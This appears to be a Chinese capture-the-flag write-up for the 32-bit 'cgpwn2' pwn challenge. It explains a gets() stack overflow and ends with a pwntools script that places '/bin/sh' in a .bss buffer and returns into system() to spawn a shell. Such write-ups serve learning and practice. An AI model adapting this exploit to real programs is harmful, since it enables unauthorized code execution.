分析
我们来看这道题,首先checksec并运行一下
可以看到是32位程序,有两个输入点,保护只有 NX。
接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西
这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数
很遗憾的是只有system函数而没有我们需要的shellcode
看来只能我们自己往程序里面写了,可以发现的是第一个输入点哪儿有一个name,点击跟进
.bss 段的一个地址,我们知道NX开启的时候,.BSS也不一定就是不能执行的,我们可以先试试看,在第一个输入点输入 “/bin/sh”,第二个输入点溢出利用
结束了,它是可以成功利用的,over
构造payload的时候注意这是32位程序,而32位程序调用函数时栈的结构为:调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1
exp
from pwn import *
context.log_level = 'info'
#r = remote('', )
r = process('./cgpwn2')
elf = ELF('./cgpwn2')
r.recvuntil("please tell me your name")
r.sendline("/bin/sh")
payload = 'a'*0x26 + 'a'*4 + p32(elf.sym['system']) + 'aaaa' + p32(0x0804A080) #最后这个是name地址,ida中复制即可
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)
r.interactive()
博客(buryia.top),欢迎师傅们来踩踩